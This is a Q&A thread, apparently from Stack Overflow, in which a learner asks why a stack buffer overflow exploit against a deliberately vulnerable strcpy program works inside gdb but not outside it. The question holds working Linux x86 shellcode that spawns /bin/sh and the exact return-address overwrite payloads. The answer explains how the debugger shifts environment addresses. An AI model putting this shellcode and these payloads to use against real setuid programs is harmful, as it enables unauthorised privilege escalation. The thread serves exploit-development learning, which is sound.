0

I'm currently trying to understand why one of my methods to exploit a buffer overflow in a program is not working. I tried two solutions, the 1st one works but not the second one. Whereas the 1st method just adds a bunch of NOP where the return address points to. The program does not contains any stack protections mechanisms. I'm working on a x86 debian machine (ASLR off), kernel 2.6.32-5-686 with the following vulnerable code:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void vuln(char *arg)
{
        char msg[12];
        strcpy(msg,arg);
}

int main(int argc, char** argv)
{
    if (argc != 2)
    {
        printf("Usage : prog arg\n");
        exit(1);
    }

    vuln(argv[1]);


    return 0;
}

So, this method is working:

  1. EGG will contain 100x NOP and my shellcode

    export EGG=`python2.6 -c 'print "\x90"*100 + "\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"'`

  2. EGG env variable found at: 0xbffffe10 using "x/200s $esp" in gdb

  3. Exploiting the program with:

    ./a.out `python2.6 -c 'print "\x90"*24 + "\x50\xfe\xff\xbf"'`

    where I added 0x40 to the EGG address to let EIP points into the NOP heap.

And this one is NOT working:

  1. export EGG=`python2.6 -c 'print "\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"'`

  2. EGG env variable found at: 0xbffffe75 using "x/200s $esp" in gdb

  3. Exploiting the program with:

    ./a.out `python2.6 -c 'print "\x90"*24 + "\x79\xfe\xff\xbf"'`

    where I added 0x4 to the EGG var to ignore the address starting at "EGG="

Here the shell spawns into gdb but I'm not suid as I would like to, and outside gdb the program just segfault... While using into gdb:

r `python2.6 -c 'print "\x90"*24 + "AABC"'`

I get what I was supposed to get:

Cannot access memory at address 0x43424141
0x43424141 in ?? ()

So I was in fact erasing the right return address... What I did wrong? Why gdb spawns a shell and nothing is working outside the debugger?

Improve this question
2
  • I'm not sure that exactly 12 bytes are allocated for msg. It may very well be 16 bytes or some other power of two. Commented Aug 3, 2013 at 16:26
  • Use the gdb debugger to understand what actual addresses are involved. I suspect your overflow goes towards upper call frames (that of main or even its caller from crt0.o)... Commented Aug 3, 2013 at 16:28

1 Answer 1

Reset to default
0

The environment provided by gdb is different from when you launch from shell. You need to adjust your addresses:

For example (with ASLR off):

$ cat test.c
#include <stdio.h>

int main()
{
    int *i;
    printf("stack var at: %p\n", i);
    printf("env var at: %p\n", (void *)getenv("PATH"));
}

Gives:

$./test 
stack var at: 0xb7fc7ff4
env var at: 0xbffffebd

$ gdb test
Reading symbols from /home/user/test...(no debugging symbols found)...done.
(gdb) run
Starting program: /home/user/test 
stack var at: 0xb7fc7ff4
env var at: 0xbffffe91

Compare, for example, results of show environment in gdb and printenv in shell

Improve this answer
Sign up to request clarification or add additional context in comments.

1 Comment

Doesn't the address change only when ASLR is on? Why would the address be different into and outside of gdb?

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.